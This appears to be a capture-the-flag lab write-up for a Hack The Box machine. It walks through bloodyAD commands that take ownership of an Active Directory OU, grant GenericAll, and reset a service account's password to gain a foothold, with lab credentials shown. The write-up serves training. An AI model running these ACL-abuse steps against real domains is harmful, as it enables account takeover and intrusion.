InfoSec LAB

Rebound_OU

Created: 5 min read

OU

After discovering that the WRITE_VALIDATED access essentially grants membership to the ServiceMgmt group as in “SELF”, I continued the domain enumeration

┌──(kali㉿kali)-[~/archive/htb/labs/rebound]
└─$ bloodyAD -d rebound.htb -u oorend -p '1GR8t@$$4u' --host dc01.rebound.htb get children 'DC=rebound,DC=htb' --type organizationalUnit
 
distinguishedname: OU=Service Users,DC=rebound,DC=htb
 
distinguishedname: OU=Domain Controllers,DC=rebound,DC=htb

BloodyAD returns 2 OUs from the target domain; Service Users and Domain Controllers This discovery is completely new since they were never revealed in the earlier BloodHound enumeration

While the Domain Controllers OU appears rather generic and default, I will look more into the Service Users OU

┌──(kali㉿kali)-[~/archive/htb/labs/rebound]
└─$ bloodyAD -d rebound.htb -u ldap_monitor -p '1GR8t@$$4u' --host dc01.rebound.htb get children 'OU=Service Users,DC=rebound,DC=htb' 
 
distinguishedname: CN=batch_runner,OU=Service Users,DC=rebound,DC=htb
 
distinguishedname: CN=winrm_svc,OU=Service Users,DC=rebound,DC=htb

The Service Users OU contains users; batch_runner and winrm_svc Those domain users have been already enumerated from the earlier BloodHound session The winrm_svc account rationally appears to be the ticket to foothold as the user has membership to the Remote Mamagement Users group

Now, I will check the ACL of the Service Users OU

┌──(kali㉿kali)-[~/archive/htb/labs/rebound]
└─$ bloodyAD -d rebound.htb -u oorend -p '1GR8t@$$4u' --host dc01.rebound.htb get object 'OU=Service Users,DC=rebound,DC=htb' --resolve-sd
 
distinguishedname: OU=Service Users,DC=rebound,DC=htb
dscorepropagationdata: 2023-09-11 13:11:06+00:00; 2023-09-11 13:11:01+00:00; 2023-09-11 13:04:07+00:00; 2023-09-11 13:04:01+00:00; 1601-01-01 00:00:00+00:00
instancetype: 4
ntsecuritydescriptor.owner: Domain Admins
ntsecuritydescriptor.control: DACL_AUTO_INHERITED|DACL_PRESENT|SACL_AUTO_INHERITED|SELF_RELATIVE
ntsecuritydescriptor.acl.0.type: == ALLOWED_OBJECT ==
ntsecuritydescriptor.acl.0.trustee: ACCOUNT_OPERATORS
ntsecuritydescriptor.acl.0.right: DELETE_CHILD|CREATE_CHILD
ntsecuritydescriptor.acl.0.objecttype: Computer; inetOrgPerson; User; Group
ntsecuritydescriptor.acl.1.type: == ALLOWED_OBJECT ==
ntsecuritydescriptor.acl.1.trustee: PRINTER_OPERATORS
ntsecuritydescriptor.acl.1.right: DELETE_CHILD|CREATE_CHILD
ntsecuritydescriptor.acl.1.objecttype: Print-Queue
ntsecuritydescriptor.acl.2.type: == ALLOWED ==
ntsecuritydescriptor.acl.2.trustee: Domain Admins; LOCAL_SYSTEM; ServiceMgmt
ntsecuritydescriptor.acl.2.right: GENERIC_ALL
ntsecuritydescriptor.acl.2.objecttype: Self
ntsecuritydescriptor.acl.3.type: == ALLOWED ==
ntsecuritydescriptor.acl.3.trustee: ENTERPRISE_DOMAIN_CONTROLLERS; AUTHENTICATED_USERS
ntsecuritydescriptor.acl.3.right: GENERIC_READ
ntsecuritydescriptor.acl.3.objecttype: Self
ntsecuritydescriptor.acl.4.type: == ALLOWED_OBJECT ==
ntsecuritydescriptor.acl.4.trustee: ALIAS_PREW2KCOMPACC
ntsecuritydescriptor.acl.4.right: READ_PROP
ntsecuritydescriptor.acl.4.objecttype: Account-Restrictions; Group-Membership; Logon-Information; General-Information; Remote-Access-Information
ntsecuritydescriptor.acl.4.inheritedobjecttype: inetOrgPerson; User
ntsecuritydescriptor.acl.4.flags: CONTAINER_INHERIT; INHERIT_ONLY; INHERITED
ntsecuritydescriptor.acl.5.type: == ALLOWED_OBJECT ==
ntsecuritydescriptor.acl.5.trustee: Enterprise Key Admins; Key Admins
ntsecuritydescriptor.acl.5.right: WRITE_PROP|READ_PROP
ntsecuritydescriptor.acl.5.objecttype: ms-DS-Key-Credential-Link
ntsecuritydescriptor.acl.5.flags: CONTAINER_INHERIT; INHERITED
ntsecuritydescriptor.acl.6.type: == ALLOWED_OBJECT ==
ntsecuritydescriptor.acl.6.trustee: PRINCIPAL_SELF; CREATOR_OWNER
ntsecuritydescriptor.acl.6.right: WRITE_VALIDATED
ntsecuritydescriptor.acl.6.objecttype: DS-Validated-Write-Computer
ntsecuritydescriptor.acl.6.inheritedobjecttype: Computer
ntsecuritydescriptor.acl.6.flags: CONTAINER_INHERIT; INHERIT_ONLY; INHERITED
ntsecuritydescriptor.acl.7.type: == ALLOWED_OBJECT ==
ntsecuritydescriptor.acl.7.trustee: ENTERPRISE_DOMAIN_CONTROLLERS
ntsecuritydescriptor.acl.7.right: READ_PROP
ntsecuritydescriptor.acl.7.objecttype: Token-Groups
ntsecuritydescriptor.acl.7.inheritedobjecttype: Computer; User; Group
ntsecuritydescriptor.acl.7.flags: CONTAINER_INHERIT; INHERIT_ONLY; INHERITED
ntsecuritydescriptor.acl.8.type: == ALLOWED_OBJECT ==
ntsecuritydescriptor.acl.8.trustee: PRINCIPAL_SELF
ntsecuritydescriptor.acl.8.right: WRITE_PROP
ntsecuritydescriptor.acl.8.objecttype: ms-TPM-Tpm-Information-For-Computer
ntsecuritydescriptor.acl.8.inheritedobjecttype: Computer
ntsecuritydescriptor.acl.8.flags: CONTAINER_INHERIT; INHERIT_ONLY; INHERITED
ntsecuritydescriptor.acl.9.type: == ALLOWED_OBJECT ==
ntsecuritydescriptor.acl.9.trustee: ALIAS_PREW2KCOMPACC
ntsecuritydescriptor.acl.9.right: GENERIC_READ
ntsecuritydescriptor.acl.9.objecttype: Self
ntsecuritydescriptor.acl.9.inheritedobjecttype: inetOrgPerson; User; Group
ntsecuritydescriptor.acl.9.flags: CONTAINER_INHERIT; INHERIT_ONLY; INHERITED
ntsecuritydescriptor.acl.10.type: == ALLOWED_OBJECT ==
ntsecuritydescriptor.acl.10.trustee: PRINCIPAL_SELF
ntsecuritydescriptor.acl.10.right: WRITE_PROP|READ_PROP
ntsecuritydescriptor.acl.10.objecttype: ms-DS-Allowed-To-Act-On-Behalf-Of-Other-Identity
ntsecuritydescriptor.acl.10.flags: CONTAINER_INHERIT; INHERITED; OBJECT_INHERIT
ntsecuritydescriptor.acl.11.type: == ALLOWED_OBJECT ==
ntsecuritydescriptor.acl.11.trustee: PRINCIPAL_SELF
ntsecuritydescriptor.acl.11.right: CONTROL_ACCESS|WRITE_PROP|READ_PROP
ntsecuritydescriptor.acl.11.objecttype: Private-Information
ntsecuritydescriptor.acl.11.flags: CONTAINER_INHERIT; INHERITED
ntsecuritydescriptor.acl.12.type: == ALLOWED ==
ntsecuritydescriptor.acl.12.trustee: Enterprise Admins
ntsecuritydescriptor.acl.12.right: GENERIC_ALL
ntsecuritydescriptor.acl.12.objecttype: Self
ntsecuritydescriptor.acl.12.flags: CONTAINER_INHERIT; INHERITED
ntsecuritydescriptor.acl.13.type: == ALLOWED ==
ntsecuritydescriptor.acl.13.trustee: ALIAS_PREW2KCOMPACC
ntsecuritydescriptor.acl.13.right: LIST_CHILD
ntsecuritydescriptor.acl.13.objecttype: Self
ntsecuritydescriptor.acl.13.flags: CONTAINER_INHERIT; INHERITED
ntsecuritydescriptor.acl.14.type: == ALLOWED ==
ntsecuritydescriptor.acl.14.trustee: BUILTIN_ADMINISTRATORS
ntsecuritydescriptor.acl.14.right: WRITE_OWNER|WRITE_DACL|GENERIC_READ|DELETE|CONTROL_ACCESS|WRITE_PROP|WRITE_VALIDATED|CREATE_CHILD
ntsecuritydescriptor.acl.14.objecttype: Self
ntsecuritydescriptor.acl.14.flags: CONTAINER_INHERIT; INHERITED
name: Service Users
objectcategory: CN=Organizational-Unit,CN=Schema,CN=Configuration,DC=rebound,DC=htb
objectclass: top; organizationalUnit
objectguid: {fc826af9-06f9-47e7-866e-4c3c015638b8}
ou: Service Users
usnchanged: 170082
usncreated: 69325
whenchanged: 2023-09-11 13:11:06+00:00
whencreated: 2023-04-08 09:07:56+00:00

It took a while to thoroughly review each line, and eventually, I identified the Access Control Entry (ACE) that I can potentially exploit.

GENERIC ALL

It’s this one; GENERIC_ALL The above ACE set to the Service Users OU grants the ServiceMgmt group the GENRIC_ALL access to self

Additionally, other set ACEs would allow me to modify the properties, which include its members

There are so many ways to go about proceeding further when it comes to abusing the Generic ALL access Since the winrm_svc account appears to be the direct route to foothold, I will attempt to reset the password of the user

WriteOwner

┌──(kali㉿kali)-[~/archive/htb/labs/rebound]
└─$ bloodyAD -d rebound.htb -u oorend -p '1GR8t@$$4u' --host dc01.rebound.htb set owner 'OU=Service Users,DC=rebound,DC=htb' oorend
[+] Old owner S-1-5-21-4078382237-1492182817-2568127209-512 is now replaced by oorend on OU=Service Users,DC=rebound,DC=htb

I will first grant the oorend user the ownership over the Service Users OU This would allow me to have direct access to the Service Users OU with the Generic All access as the oorend user rather than having the transitive privilege from being part of the ServiceMgmt group

old user?

┌──(Kerberoasting_with_no_preauth)─(kali㉿kali)-[~/…/htb/labs/rebound/ldapdomaindump]
└─$ rpcclient $IP -N -U 'oorend%1GR8t@$$4u'
rpcclient $> lookupsids S-1-5-21-4078382237-1492182817-2568127209-512
S-1-5-21-4078382237-1492182817-2568127209-512 rebound\Domain Admins (2)

That old user, S-1-5-21-4078382237-1492182817-2568127209-512, was the rebound\Domain Admins group

Generic All

┌──(kali㉿kali)-[~/archive/htb/labs/rebound]
└─$ bloodyAD -d rebound.htb -u oorend -p '1GR8t@$$4u' --host dc01.rebound.htb add genericAll 'OU=Service Users,DC=rebound,DC=htb' oorend 
[+] oorend has now GenericAll on OU=Service Users,DC=rebound,DC=htb

Now that the oorend user is the owner of the Service Users OU, I can proceed to grant the user the Generic All access

┌──(kali㉿kali)-[~/archive/htb/labs/rebound]
└─$ bloodyAD -d rebound.htb -u oorend -p '1GR8t@$$4u' --host dc01.rebound.htb get object 'OU=Service Users,DC=rebound,DC=htb' --resolve-sd
 
distinguishedname: OU=Service Users,DC=rebound,DC=htb
instancetype: 4
ntsecuritydescriptor.owner: oorend
 
ntsecuritydescriptor.acl.2.type: == ALLOWED ==
ntsecuritydescriptor.acl.2.trustee: Domain Admins; LOCAL_SYSTEM; ServiceMgmt
ntsecuritydescriptor.acl.2.right: GENERIC_ALL
ntsecuritydescriptor.acl.2.objecttype: Self
ntsecuritydescriptor.acl.3.type: == ALLOWED ==
ntsecuritydescriptor.acl.3.trustee: oorend
ntsecuritydescriptor.acl.3.right: GENERIC_ALL
ntsecuritydescriptor.acl.3.objecttype: Self
ntsecuritydescriptor.acl.3.flags: CONTAINER_INHERIT; OBJECT_INHERIT
 
[...REDACTED...]
 
ou: Service Users

It’s confirmed

Password Reset

┌──(kali㉿kali)-[~/archive/htb/labs/rebound]
└─$ bloodyAD set password --help
usage: bloodyAD set password [-h] [--oldpass OLDPASS] target newpass
 
positional arguments:
  target             sAMAccountName, DN, GUID or SID of the target
  newpass            new password for the target
 
options:
  -h, --help         show this help message and exit
  --oldpass OLDPASS  old password of the target, mandatory if you don't have "change password" permission
                     on the target (default: None)

BloodyAD natively supports password reset as well

┌──(kali㉿kali)-[~/archive/htb/labs/rebound]
└─$ bloodyAD -d rebound.htb -u oorend -p '1GR8t@$$4u' --host dc01.rebound.htb set password 'CN=winrm_svc,OU=Service Users,DC=rebound,DC=htb' Qwer1234
[+] Password changed successfully!

Done The password of the winrm_svc account is updated to Qwer1234 Now I should be able to authenticate to the target WinRM server using the above credential; winrm_svc:Qwer1234

Interactive Graph View

Backlinks